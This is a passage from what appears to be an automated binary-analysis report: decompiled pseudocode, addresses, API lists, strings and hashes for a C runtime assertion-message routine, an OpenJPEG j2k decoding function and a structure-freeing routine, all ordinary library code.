				void* _t174;
				char* _t176;
				char* _t177;
				void* _t179;
				void* _t181;
				void* _t182;
				signed int _t184;
				void* _t185;
				void* _t186;
				void* _t188;
				signed int _t194;
				WCHAR* _t197;
				intOrPtr* _t198;
				signed int _t200;
				intOrPtr* _t202;
				intOrPtr* _t204;
				intOrPtr* _t207;
				void* _t211;
				void* _t215;
				intOrPtr* _t216;
				void* _t218;
				signed int _t219;
				char _t221;
				signed short* _t224;
				intOrPtr* _t226;
				signed int _t229;
				void* _t230;
				signed int _t234;
				void* _t236;
				void* _t237;
				void* _t240;
				void* _t286;

				_t286 = __fp0;
				_t214 = __edx;
				_t229 = _t234;
				_t93 =  *0x6ee77a68; // 0xbfafeb97
				_v8 = _t93 ^ _t229;
				_t190 = _a24;
				_t226 = _a4;
				_t221 = _a8;
				_v552 = _a12;
				_v536 = _a16;
				_t97 = E6EE485D1(_t226, _t221, L"Assertion failed!");
				_v540 = _v540 & 0x00000000;
				_t236 = _t234 - 0x228 + 0xc;
				if(_t97 != 0) {
					L66:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6EE3AC93();
					asm("int3");
					_push(_t229);
					_t230 = _t236;
					_push(_t197);
					_push(_t197);
					E6EE3EDB5(_t190, _t221, _t226, _t286, _v584, _v580, _v576);
					_t101 = E6EE3ADD6(2);
					_t237 = _t236 + 0x10;
					_t102 =  *(_t101 + 0xc);
					__eflags = _t102 & 0x000004c0;
					if((_t102 & 0x000004c0) == 0) {
						_push(0);
						_push(4);
						_t119 = E6EE3ADD6(2);
						_t197 = 0;
						_push(_t119);
						E6EE41DAA(_t190, _t221, _t226, _t286);
						_t237 = _t237 + 0x10;
					}
					_push(0);
					_v12 = E6EE3EE64();
					_v16 = E6EE3ADD6(2);
					_push( &_a8);
					_push( &_a4);
					_push( &_v0);
					L70();
					E6EE41A50(_t190, _t197, _t221, _t226, _t286, E6EE3ADD6(2));
					E6EE3E6F4(_t190, _t197, _t214, _t221, _t226, _t286,  &_v16,  &_v12);
					asm("int3");
					_push(_t230);
					_push( *_v580);
					_push( *_v584);
					return E6EE3EF06( *_v596,  *_v592,  *_v588);
				} else {
					_t121 = E6EE4855C(_t226, _t221, L"\n\n");
					_t236 = _t236 + 0xc;
					if(_t121 != 0) {
						goto L66;
					} else {
						_t122 = E6EE4855C(_t226, _t221, L"Program: ");
						_t236 = _t236 + 0xc;
						if(_t122 != 0) {
							goto L66;
						} else {
							E6EE38EC0(_t221,  &_v532, _t122, 0x20a);
							_t240 = _t236 + 0xc;
							_v548 = 0;
							_t126 =  &_v548;
							__imp__GetModuleHandleExW(6, _t190, _t126);
							_t197 =  &_v532;
							_t190 = 0x105;
							asm("sbb eax, eax");
							_t128 =  ~_t126 & _v548;
							_v548 = _t128;
							if(GetModuleFileNameW(_t128, _t197, 0x105) != 0) {
								L6:
								_t190 =  &_v532;
								_t198 =  &_v532;
								_t214 = _t198 + 2;
								do {
									_t130 =  *_t198;
									_t198 = _t198 + 2;
								} while (_t130 != _v540);
								_t197 = _t198 - _t214 >> 1;
								if( &(_t197[5]) <= 0x40) {
									L10:
									_t132 = E6EE4855C(_t226, _t221, _t190);
									_t236 = _t240 + 0xc;
									if(_t132 != 0) {
										goto L66;
									} else {
										_t133 = E6EE4855C(_t226, _t221, "\n");
										_t236 = _t236 + 0xc;
										if(_t133 != 0) {
											goto L66;
										} else {
											_t134 = E6EE4855C(_t226, _t221, L"File: ");
											_t236 = _t236 + 0xc;
											if(_t134 != 0) {
												goto L66;
											} else {
												_t214 = _v536;
												_t200 = _t214;
												_t190 = _t200 + 2;
												do {
													_t135 =  *_t200;
													_t200 = _t200 + 2;
												} while (_t135 != _v540);
												_t197 = _t200 - _t190 >> 1;
												if( &(_t197[4]) <= 0x40) {
													_push(_t214);
													goto L35;
												} else {
													_t194 = _t214;
													_t211 = _t194 + 2;
													do {
														_t161 =  *_t194;
														_t194 = _t194 + 2;
													} while (_t161 != _v540);
													_v544 = 0x5c;
													_t190 = _t194 - _t211 >> 1;
													_t197 = 1;
													_t162 =  *(_t214 + _t190 * 2 - 2) & 0x0000ffff;
													if(_t162 != _v544) {
														_v556 = _t162;
														_t224 = _t214 - 2 + _t190 * 2;
														_t219 = _t162;
														while(_t219 != 0x2f && _t197 < _t190) {
															_t224 = _t224 - 2;
															_t197 =  &(_t197[0]);
															_t184 =  *_t224 & 0x0000ffff;
															_t219 = _t184;
															if(_t184 != _v544) {
																continue;
															}
															break;
														}
														_t221 = _a8;
														_t214 = _v536;
													}
													_t164 = _t190 - _t197;
													_v544 = _t164;
													if(_t164 <= 0x26) {
														L30:
														if(__eflags >= 0) {
															_push(0x23);
															_t165 = E6EE4871C(_t197, _t226, _t221, _t214);
															_t236 = _t236 + 0x10;
															__eflags = _t165;
															if(_t165 != 0) {
																goto L66;
															} else {
																_t166 = E6EE4855C(_t226, _t221, L"...");
																_t236 = _t236 + 0xc;
																__eflags = _t166;
																if(_t166 != 0) {
																	goto L66;
																} else {
																	_t197 = _v544;
																	_push(8);
																	_t169 = E6EE4871C(_t197, _t226, _t221, _v536 + _t197 * 2);
																	_t236 = _t236 + 0x10;
																	__eflags = _t169;
																	if(_t169 != 0) {
																		goto L66;
																	} else {
																		_t170 = E6EE4855C(_t226, _t221, L"...");
																		_t236 = _t236 + 0xc;
																		__eflags = _t170;
																		if(_t170 != 0) {
																			goto L66;
																		} else {
																			_t173 = _v536 + _t190 * 2 + 0xfffffff2;
																			goto L34;
																		}
																	}
																}
															}
														} else {
															_t174 = 0x35;
															_t197 = _t197 >> 1;
															_v556 = _t197;
															_push(_t174 - _t197);
															_t176 = E6EE4871C(_t197, _t226, _t221, _t214);
															_t236 = _t236 + 0x10;
															__eflags = _t176;
															if(_t176 != 0) {
																goto L66;
															} else {
																_t177 = E6EE4855C(_t226, _t221, L"...");
																_t236 = _t236 + 0xc;
																__eflags = _t177;
																if(_t177 != 0) {
																	goto L66;
																} else {
																	_t190 = _t190 - _v556;
																	__eflags = _t190;
																	_t173 = _v536 + _t190 * 2;
																	goto L34;
																}
															}
														}
													} else {
														if(_t197 >= 0x12) {
															__eflags = _t164 - 0x26;
															goto L30;
														} else {
															_t179 = 0x35;
															_push(_t179 - _t197);
															_t181 = E6EE4871C(_t197, _t226, _t221, _t214);
															_t236 = _t236 + 0x10;
															if(_t181 != 0) {
																goto L66;
															} else {
																_t182 = E6EE4855C(_t226, _t221, L"...");
																_t236 = _t236 + 0xc;
																if(_t182 != 0) {
																	goto L66;
																} else {
																	_t197 = _v544;
																	_t173 = _v536 + _t197 * 2;
																	L34:
																	_push(_t173);
																	L35:
																	_push(_t221);
																	_push(_t226);
																	_t137 = E6EE4855C();
																	_t236 = _t236 + 0xc;
																	if(_t137 != 0) {
																		goto L66;
																	} else {
																		_t138 = E6EE4855C(_t226, _t221, "\n");
																		_t236 = _t236 + 0xc;
																		if(_t138 != 0) {
																			goto L66;
																		} else {
																			_t139 = E6EE4855C(_t226, _t221, L"Line: ");
																			_t236 = _t236 + 0xc;
																			if(_t139 != 0) {
																				goto L66;
																			} else {
																				_t202 = _t226;
																				_t53 = _t202 + 2; // 0x32
																				_t215 = _t53;
																				do {
																					_t140 =  *_t202;
																					_t202 = _t202 + 2;
																				} while (_t140 != 0);
																				_t216 = _t226;
																				_t197 = _t202 - _t215 >> 1;
																				_t54 = _t216 + 2; // 0x32
																				_t190 = _t54;
																				do {
																					_t141 =  *_t216;
																					_t216 = _t216 + 2;
																				} while (_t141 != _v540);
																				_t214 = _t216 - _t190 >> 1;
																				_t145 = E6EE484EA(_t197, _a20, _t226 + (_t216 - _t190 >> 1) * 2, _t221 - _t197, 0xa);
																				_t236 = _t236 + 0x10;
																				if(_t145 != 0) {
																					goto L66;
																				} else {
																					_t146 = E6EE4855C(_t226, _t221, L"\n\n");
																					_t236 = _t236 + 0xc;
																					if(_t146 != 0) {
																						goto L66;
																					} else {
																						_t147 = E6EE4855C(_t226, _t221, L"Expression: ");
																						_t236 = _t236 + 0xc;
																						if(_t147 != 0) {
																							goto L66;
																						} else {
																							_t204 = _t226;
																							_t59 = _t204 + 2; // 0x32
																							_t218 = _t59;
																							do {
																								_t148 =  *_t204;
																								_t204 = _t204 + 2;
																							} while (_t148 != 0);
																							_t60 = (_t204 - _t218 >> 1) + 0xb0; // 0xde
																							_t214 = _t60;
																							_t207 = _v552;
																							_t190 = _t207 + 2;
																							do {
																								_t149 =  *_t207;
																								_t207 = _t207 + 2;
																							} while (_t149 != _v540);
																							_t197 = _t207 - _t190 >> 1;
																							if(_t197 + _t214 <= _t221) {
																								_push(_v552);
																								goto L52;
																							} else {
																								_push(_t221 - _t214 - 3);
																								_t160 = E6EE4871C(_t197, _t226, _t221, _v552);
																								_t236 = _t236 + 0x10;
																								if(_t160 != 0) {
																									goto L66;
																								} else {
																									_push(L"...");
																									L52:
																									_push(_t221);
																									_push(_t226);
																									_t151 = E6EE4855C();
																									_t236 = _t236 + 0xc;
																									if(_t151 != 0) {
																										goto L66;
																									} else {
																										_t190 = L"\n\n";
																										_t152 = E6EE4855C(_t226, _t221, L"\n\n");
																										_t236 = _t236 + 0xc;
																										if(_t152 != 0) {
																											goto L66;
																										} else {
																											_t153 = E6EE4855C(_t226, _t221, L"For information on how your program can cause an assertion\nfailure, see the Visual C++ documentation on asserts");
																											_t236 = _t236 + 0xc;
																											if(_t153 != 0) {
																												goto L66;
																											} else {
																												_t154 = E6EE4855C(_t226, _t221, L"\n\n");
																												_t236 = _t236 + 0xc;
																												if(_t154 != 0) {
																													goto L66;
																												} else {
																													_t155 = E6EE4855C(_t226, _t221, L"(Press Retry to debug the application - JIT must be enabled)");
																													_t236 = _t236 + 0xc;
																													if(_t155 != 0) {
																														goto L66;
																													} else {
																														return E6EE361A7(_v8 ^ _t229);
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								} else {
									_t185 = _t197 * 2 - 0x6a;
									_t197 = 0x20a - _t185;
									_t190 =  &_v532 + _t185;
									_t186 = E6EE3EF21( &_v532 + _t185, _t197, L"...", 6);
									_t236 = _t240 + 0x10;
									if(_t186 != 0) {
										goto L66;
									} else {
										goto L10;
									}
								}
							} else {
								_t188 = E6EE485D1( &_v532, 0x105, L"<program name unknown>");
								_t236 = _t240 + 0xc;
								if(_t188 != 0) {
									goto L66;
								} else {
									goto L6;
								}
							}
						}
					}
				}
			}

0x6ee3e828
0x6ee3e828
0x6ee3e82b
0x6ee3e833
0x6ee3e83a
0x6ee3e841
0x6ee3e845
0x6ee3e849
0x6ee3e851
0x6ee3e85c
0x6ee3e862
0x6ee3e867
0x6ee3e86e
0x6ee3e873
0x6ee3ecfc
0x6ee3ecfe
0x6ee3ecff
0x6ee3ed00
0x6ee3ed01
0x6ee3ed02
0x6ee3ed03
0x6ee3ed08
0x6ee3ed0b
0x6ee3ed0c
0x6ee3ed0e
0x6ee3ed0f
0x6ee3ed19
0x6ee3ed20
0x6ee3ed25
0x6ee3ed28
0x6ee3ed2c
0x6ee3ed31
0x6ee3ed33
0x6ee3ed35
0x6ee3ed3b
0x6ee3ed40
0x6ee3ed41
0x6ee3ed42
0x6ee3ed47
0x6ee3ed47
0x6ee3ed4a
0x6ee3ed53
0x6ee3ed5b
0x6ee3ed61
0x6ee3ed65
0x6ee3ed69
0x6ee3ed72
0x6ee3ed7f
0x6ee3ed87
0x6ee3ed8c
0x6ee3ed8f
0x6ee3ed95
0x6ee3ed9a
0x6ee3edb4
0x6ee3e879
0x6ee3e880
0x6ee3e885
0x6ee3e88a
0x00000000
0x6ee3e890
0x6ee3e897
0x6ee3e89c
0x6ee3e8a1
0x00000000
0x6ee3e8a7
0x6ee3e8b4
0x6ee3e8b9
0x6ee3e8be
0x6ee3e8c4
0x6ee3e8ce
0x6ee3e8d6
0x6ee3e8dc
0x6ee3e8e2
0x6ee3e8e4
0x6ee3e8ec
0x6ee3e8fa
0x6ee3e919
0x6ee3e919
0x6ee3e91f
0x6ee3e921
0x6ee3e924
0x6ee3e924
0x6ee3e927
0x6ee3e92a
0x6ee3e935
0x6ee3e93d
0x6ee3e96e
0x6ee3e971
0x6ee3e976
0x6ee3e97b
0x00000000
0x6ee3e981
0x6ee3e988
0x6ee3e98d
0x6ee3e992
0x00000000
0x6ee3e998
0x6ee3e99f
0x6ee3e9a4
0x6ee3e9a9
0x00000000
0x6ee3e9af
0x6ee3e9af
0x6ee3e9b5
0x6ee3e9b7
0x6ee3e9ba
0x6ee3e9ba
0x6ee3e9bd
0x6ee3e9c0
0x6ee3e9cb
0x6ee3e9d3
0x6ee3ecdc
0x00000000
0x6ee3e9d9
0x6ee3e9d9
0x6ee3e9db
0x6ee3e9de
0x6ee3e9de
0x6ee3e9e1
0x6ee3e9e4
0x6ee3e9ef
0x6ee3e9f9
0x6ee3e9fd
0x6ee3e9fe
0x6ee3ea0a
0x6ee3ea0f
0x6ee3ea15
0x6ee3ea18
0x6ee3ea1a
0x6ee3ea24
0x6ee3ea27
0x6ee3ea28
0x6ee3ea2b
0x6ee3ea34
0x00000000
0x00000000
0x00000000
0x6ee3ea34
0x6ee3ea36
0x6ee3ea39
0x6ee3ea39
0x6ee3ea41
0x6ee3ea43
0x6ee3ea4c
0x6ee3ea97
0x6ee3ea97
0x6ee3ec74
0x6ee3ec79
0x6ee3ec7e
0x6ee3ec81
0x6ee3ec83
0x00000000
0x6ee3ec85
0x6ee3ec8c
0x6ee3ec91
0x6ee3ec94
0x6ee3ec96
0x00000000
0x6ee3ec98
0x6ee3ec98
0x6ee3eca4
0x6ee3ecac
0x6ee3ecb1
0x6ee3ecb4
0x6ee3ecb6
0x00000000
0x6ee3ecb8
0x6ee3ecbf
0x6ee3ecc4
0x6ee3ecc7
0x6ee3ecc9
0x00000000
0x6ee3eccb
0x6ee3ecd4
0x00000000
0x6ee3ecd4
0x6ee3ecc9
0x6ee3ecb6
0x6ee3ec96
0x6ee3ea9d
0x6ee3ea9f
0x6ee3eaa0
0x6ee3eaa4
0x6ee3eaaa
0x6ee3eaae
0x6ee3eab3
0x6ee3eab6
0x6ee3eab8
0x00000000
0x6ee3eabe
0x6ee3eac5
0x6ee3eaca
0x6ee3eacd
0x6ee3eacf
0x00000000
0x6ee3ead5
0x6ee3ead5
0x6ee3ead5
0x6ee3eae1
0x00000000
0x6ee3eae1
0x6ee3eacf
0x6ee3eab8
0x6ee3ea4e
0x6ee3ea51
0x6ee3ea94
0x00000000
0x6ee3ea53
0x6ee3ea55
0x6ee3ea58
0x6ee3ea5c
0x6ee3ea61
0x6ee3ea66
0x00000000
0x6ee3ea6c
0x6ee3ea73
0x6ee3ea78
0x6ee3ea7d
0x00000000
0x6ee3ea83
0x6ee3ea89
0x6ee3ea8f
0x6ee3eae4
0x6ee3eae4
0x6ee3eae5
0x6ee3eae5
0x6ee3eae6
0x6ee3eae7
0x6ee3eaec
0x6ee3eaf1
0x00000000
0x6ee3eaf7
0x6ee3eafe
0x6ee3eb03
0x6ee3eb08
0x00000000
0x6ee3eb0e
0x6ee3eb15
0x6ee3eb1a
0x6ee3eb1f
0x00000000
0x6ee3eb25
0x6ee3eb25
0x6ee3eb29
0x6ee3eb29
0x6ee3eb2c
0x6ee3eb2c
0x6ee3eb2f
0x6ee3eb32
0x6ee3eb39
0x6ee3eb3b
0x6ee3eb3d
0x6ee3eb3d
0x6ee3eb40
0x6ee3eb40
0x6ee3eb43
0x6ee3eb46
0x6ee3eb53
0x6ee3eb61
0x6ee3eb66
0x6ee3eb6b
0x00000000
0x6ee3eb71
0x6ee3eb78
0x6ee3eb7d
0x6ee3eb82
0x00000000
0x6ee3eb88
0x6ee3eb8f
0x6ee3eb94
0x6ee3eb99
0x00000000
0x6ee3eb9f
0x6ee3eb9f
0x6ee3eba3
0x6ee3eba3
0x6ee3eba6
0x6ee3eba6
0x6ee3eba9
0x6ee3ebac
0x6ee3ebb5
0x6ee3ebb5
0x6ee3ebbb
0x6ee3ebc1
0x6ee3ebc4
0x6ee3ebc4
0x6ee3ebc7
0x6ee3ebca
0x6ee3ebd5
0x6ee3ebdc
0x6ee3ece2
0x00000000
0x6ee3ebe2
0x6ee3ebe9
0x6ee3ebf2
0x6ee3ebf7
0x6ee3ebfc
0x00000000
0x6ee3ec02
0x6ee3ec02
0x6ee3ec07
0x6ee3ec07
0x6ee3ec08
0x6ee3ec09
0x6ee3ec0e
0x6ee3ec13
0x00000000
0x6ee3ec19
0x6ee3ec19
0x6ee3ec21
0x6ee3ec26
0x6ee3ec2b
0x00000000
0x6ee3ec31
0x6ee3ec38
0x6ee3ec3d
0x6ee3ec42
0x00000000
0x6ee3ec48
0x6ee3ec4b
0x6ee3ec50
0x6ee3ec55
0x00000000
0x6ee3ec5b
0x6ee3ec62
0x6ee3ec67
0x6ee3ec6c
0x00000000
0x6ee3ec72
0x6ee3ecfb
0x6ee3ecfb
0x6ee3ec6c
0x6ee3ec55
0x6ee3ec42
0x6ee3ec2b
0x6ee3ec13
0x6ee3ebfc
0x6ee3ebdc
0x6ee3eb99
0x6ee3eb82
0x6ee3eb6b
0x6ee3eb1f
0x6ee3eb08
0x6ee3eaf1
0x6ee3ea7d
0x6ee3ea66
0x6ee3ea51
0x6ee3ea4c
0x6ee3e9d3
0x6ee3e9a9
0x6ee3e992
0x6ee3e93f
0x6ee3e93f
0x6ee3e952
0x6ee3e95a
0x6ee3e95e
0x6ee3e963
0x6ee3e968
0x00000000
0x00000000
0x00000000
0x00000000
0x6ee3e968
0x6ee3e8fc
0x6ee3e909
0x6ee3e90e
0x6ee3e913
0x00000000
0x00000000
0x00000000
0x00000000
0x6ee3e913
0x6ee3e8fa
0x6ee3e8a1
0x6ee3e88a

APIs

GetModuleHandleExW.KERNEL32(00000006,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6EE3E8CE
GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6EE3E8F2

Strings

(Press Retry to debug the application - JIT must be enabled), xrefs: 6EE3EC5B
Expression: , xrefs: 6EE3EB88
Program: , xrefs: 6EE3E890
For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts, xrefs: 6EE3EC31
\, xrefs: 6EE3E9EF
..., xrefs: 6EE3E94D, 6EE3EA6C, 6EE3EABE, 6EE3EC02, 6EE3EC85, 6EE3ECB8
Assertion failed!, xrefs: 6EE3E84C
File: , xrefs: 6EE3E998
Line: , xrefs: 6EE3EB0E
<program name unknown>, xrefs: 6EE3E8FC

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: Module$FileHandleName
String ID: (Press Retry to debug the application - JIT must be enabled)$...$<program name unknown>$Assertion failed!$Expression: $File: $For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts$Line: $Program: $\
API String ID: 4146042529-3261600717
Opcode ID: 69ce0ddf7613f0dc86d8dc2422fc46a0253b1ac9adaba93324d412450667a21a
Instruction ID: 9fc330178e864edb2c7378999140405ae8c7e5583e21618944f996a037e2d62f
Opcode Fuzzy Hash: 69ce0ddf7613f0dc86d8dc2422fc46a0253b1ac9adaba93324d412450667a21a
Instruction Fuzzy Hash: 0FC12A74A2062AA6C714AAA48C44FDF77BCEF85308F340469FC05D5319F731AE56CAA5

Uniqueness

Uniqueness Score: -1.00%

Function 6EDDB750, Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 138
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E6EDDB750(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				intOrPtr _t48;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t60;
				void* _t83;
				void* _t113;

				_t124 = __fp0;
				_t112 = __esi;
				_t111 = __edi;
				_t97 = __edx;
				_t83 = __ecx;
				_t82 = __ebx;
				_t120 = _a8;
				if(_a8 == 0) {
					_push(0x2045);
					E6EE3EEBE(__ebx, __edx, __edi, __esi, _t120, __fp0, L"p_j2k != 00", L"j2k.c");
					_t113 = _t113 + 0xc;
				}
				_t121 = _a4;
				if(_a4 == 0) {
					_push(0x2046);
					E6EE3EEBE(_t82, _t97, _t111, _t112, _t121, _t124, L"p_stream != 00", L"j2k.c");
					_t113 = _t113 + 0xc;
				}
				_t122 = _a16;
				if(_a16 == 0) {
					_push(0x2047);
					E6EE3EEBE(_t82, _t97, _t111, _t112, _t122, _t124, L"p_manager != 00", L"j2k.c");
					_t113 = _t113 + 0xc;
				}
				 *((intOrPtr*)(_a8 + 0x48)) = E6EE20B90(_t83);
				_t98 = _a8;
				if( *((intOrPtr*)(_a8 + 0x48)) != 0) {
					_t48 = E6EDDF930(_t82, _t98, _t111, _t112, _t124, _a8, _a16);
					__eflags = _t48;
					if(_t48 != 0) {
						_t51 = E6EDDFD60(_t82,  *((intOrPtr*)(_a8 + 0xbc)), _t111, _t112, _t124, _a8,  *((intOrPtr*)(_a8 + 0xbc)), _a4, _a16);
						__eflags = _t51;
						if(_t51 != 0) {
							_t52 = E6EDDF0A0(_t82, _a8, _t111, _t112, _t124, _a8, _a16);
							__eflags = _t52;
							if(_t52 != 0) {
								_t89 = _a8;
								_t55 = E6EDDFD60(_t82, _a8, _t111, _t112, _t124, _a8,  *((intOrPtr*)(_a8 + 0xb8)), _a4, _a16);
								__eflags = _t55;
								if(_t55 != 0) {
									 *_a12 = E6EE20B90(_t89);
									__eflags =  *_a12;
									if( *_a12 != 0) {
										E6EE20D60(_t82,  *_a12, _t111, _t112, _t124,  *((intOrPtr*)(_a8 + 0x48)),  *_a12);
										_t60 = E6EDE3A60( *((intOrPtr*)(_a8 + 0x48)), _a8);
										__eflags = _t60;
										if(_t60 != 0) {
											return 1;
										}
										 *0x6ee67160( *_a12);
										 *_a12 = 0;
										return 0;
									}
									return 0;
								}
								 *0x6ee67160( *((intOrPtr*)(_a8 + 0x48)));
								 *((intOrPtr*)(_a8 + 0x48)) = 0;
								return 0;
							}
							 *0x6ee67160( *((intOrPtr*)(_a8 + 0x48)));
							 *((intOrPtr*)(_a8 + 0x48)) = 0;
							return 0;
						}
						 *0x6ee67160( *((intOrPtr*)(_a8 + 0x48)));
						 *((intOrPtr*)(_a8 + 0x48)) = 0;
						return 0;
					}
					 *0x6ee67160( *((intOrPtr*)(_a8 + 0x48)));
					 *((intOrPtr*)(_a8 + 0x48)) = 0;
					return 0;
				} else {
					return 0;
				}
			}

0x6eddb750
0x6eddb750
0x6eddb750
0x6eddb750
0x6eddb750
0x6eddb750
0x6eddb753
0x6eddb757
0x6eddb759
0x6eddb768
0x6eddb76d
0x6eddb76d
0x6eddb770
0x6eddb774
0x6eddb776
0x6eddb785
0x6eddb78a
0x6eddb78a
0x6eddb78d
0x6eddb791
0x6eddb793
0x6eddb7a2
0x6eddb7a7
0x6eddb7a7
0x6eddb7b2
0x6eddb7b5
0x6eddb7bc
0x6eddb7cd
0x6eddb7d5
0x6eddb7d7
0x6eddb80d
0x6eddb815
0x6eddb817
0x6eddb83f
0x6eddb847
0x6eddb849
0x6eddb87b
0x6eddb87f
0x6eddb887
0x6eddb889
0x6eddb8ae
0x6eddb8b3
0x6eddb8b6
0x6eddb8c9
0x6eddb8d5
0x6eddb8dd
0x6eddb8df
0x00000000
0x6eddb8fa
0x6eddb8e7
0x6eddb8f0
0x00000000
0x6eddb8f6
0x00000000
0x6eddb8b8
0x6eddb892
0x6eddb89b
0x00000000
0x6eddb8a2
0x6eddb852
0x6eddb85b
0x00000000
0x6eddb862
0x6eddb820
0x6eddb829
0x00000000
0x6eddb830
0x6eddb7e0
0x6eddb7e9
0x00000000
0x6eddb7be
0x00000000
0x6eddb7be

APIs

_opj_image_destroy@4.BCCW1XUJAH(?), ref: 6EDDB7E0
_opj_image_destroy@4.BCCW1XUJAH(?), ref: 6EDDB820

Strings

j2k.c, xrefs: 6EDDB77B
p_j2k != 00, xrefs: 6EDDB763
j2k.c, xrefs: 6EDDB798
j2k.c, xrefs: 6EDDB75E
p_manager != 00, xrefs: 6EDDB79D
p_stream != 00, xrefs: 6EDDB780

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: _opj_image_destroy@4
String ID: j2k.c$j2k.c$j2k.c$p_j2k != 00$p_manager != 00$p_stream != 00
API String ID: 388027570-992503930
Opcode ID: 8ee47bdc652b604e9d6e8c04d360151ec84cf9d96f1ca00655d52a1a74d64a67
Instruction ID: 785a955af766e7e6b51591d60223fb8960f11c0be73501af72da87d451ecff91
Opcode Fuzzy Hash: 8ee47bdc652b604e9d6e8c04d360151ec84cf9d96f1ca00655d52a1a74d64a67
Instruction Fuzzy Hash: B4514A75A14209EFCB40DFA9C884F9A73B9BB48318F208419FD198F385E735E958CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6EE44386, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6EE44386(void* __ebx, void* __edi, void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				void* _t67;
				intOrPtr _t68;
				void* _t72;
				void* _t73;

				_t73 = __esi;
				_t72 = __edi;
				_t67 = __ebx;
				_t36 = _a4;
				_t68 =  *_a4;
				_t77 = _t68 - 0x6ee5ef50;
				if(_t68 != 0x6ee5ef50) {
					E6EE4471C(_t68);
					_t36 = _a4;
				}
				E6EE4471C( *((intOrPtr*)(_t36 + 0x3c)));
				E6EE4471C( *((intOrPtr*)(_a4 + 0x30)));
				E6EE4471C( *((intOrPtr*)(_a4 + 0x34)));
				E6EE4471C( *((intOrPtr*)(_a4 + 0x38)));
				E6EE4471C( *((intOrPtr*)(_a4 + 0x28)));
				E6EE4471C( *((intOrPtr*)(_a4 + 0x2c)));
				E6EE4471C( *((intOrPtr*)(_a4 + 0x40)));
				E6EE4471C( *((intOrPtr*)(_a4 + 0x44)));
				E6EE4471C( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E6EE441B2(_t67, _t72, _t73, _t77);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E6EE4421D(_t67, _t72, _t73, _t77);
			}

0x6ee44386
0x6ee44386
0x6ee44386
0x6ee4438b
0x6ee44391
0x6ee44393
0x6ee44399
0x6ee4439c
0x6ee443a1
0x6ee443a4
0x6ee443a8
0x6ee443b3
0x6ee443be
0x6ee443c9
0x6ee443d4
0x6ee443df
0x6ee443ea
0x6ee443f5
0x6ee44403
0x6ee4440e
0x6ee44416
0x6ee44417
0x6ee4441a
0x6ee44420
0x6ee44424
0x6ee44428
0x6ee44429
0x6ee44433
0x6ee44439
0x6ee4443a
0x6ee4443d
0x6ee44443
0x6ee44447
0x6ee4444b
0x6ee44452

APIs

_free.LIBCMT ref: 6EE4439C

Part of subcall function 6EE4471C: RtlFreeHeap.NTDLL(00000000,00000000,?,6EE5124B,?,00000000,?,?,?,6EE514EE,?,00000007,?,?,6EE4EB20,?), ref: 6EE44732
Part of subcall function 6EE4471C: GetLastError.KERNEL32(?,?,6EE5124B,?,00000000,?,?,?,6EE514EE,?,00000007,?,?,6EE4EB20,?,?), ref: 6EE44744

_free.LIBCMT ref: 6EE443A8
_free.LIBCMT ref: 6EE443B3
_free.LIBCMT ref: 6EE443BE
_free.LIBCMT ref: 6EE443C9
_free.LIBCMT ref: 6EE443D4
_free.LIBCMT ref: 6EE443DF
_free.LIBCMT ref: 6EE443EA
_free.LIBCMT ref: 6EE443F5
_free.LIBCMT ref: 6EE44403

Strings

Pn, xrefs: 6EE44393

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: Pn
API String ID: 776569668-2102977469
Opcode ID: a44e19a32cf83fa37f1638534ed164baa3c136ad3c26a51a1533c236e92034b3
